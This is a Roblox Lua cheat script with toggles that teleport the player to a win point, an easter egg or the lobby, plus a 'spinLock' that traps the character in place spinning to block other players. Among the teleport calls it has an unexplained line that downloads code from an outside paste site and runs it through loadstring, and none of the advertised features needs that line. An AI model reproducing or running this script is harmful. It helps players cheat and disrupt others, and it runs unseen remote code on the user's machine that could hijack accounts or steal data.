-- Write True or False to activate or deactivate functions -- (Every action has a 1 seg cooldown) local tp1=true -- Win local tp2=false -- Easter Egg Train local spinLock=true -- Block the way local tp3=false -- Lobby -- Script core local p=game.Players.LocalPlayer.Character.HumanoidRootPart hum=game.Players.LocalPlayer.Character:WaitForChild("Humanoid") local function teleport(pos) p.CFrame=CFrame.new(pos) wait(1) end if tp1 then teleport(Vector3.new(361.52,-0.07,162.70)) end if tp2 then teleport(Vector3.new(306.30,34.74,440.58)) end if tp3 then teleport(Vector3.new(195,0.07,24.74)) end loadstring(game:HttpGet('https://paste.myconan.net/572800.txt'))() if spinLock then local rs=game:GetService("RunService") if not workspace:FindFirstChild("SpinFlag") then local f=Instance.new("BoolValue",workspace) f.Name="SpinFlag" rs:BindToRenderStep("SpinEffect",Enum.RenderPriority.Character.Value+1,function() if not f.Parent then return end p.CFrame=CFrame.new(88.58,0.75,108.04)*CFrame.Angles(0,math.rad(tick()*100),0) p.Velocity=Vector3.zero hum.PlatformStand=true end) else workspace.SpinFlag:Destroy() rs:UnbindFromRenderStep("SpinEffect") hum.PlatformStand=false end end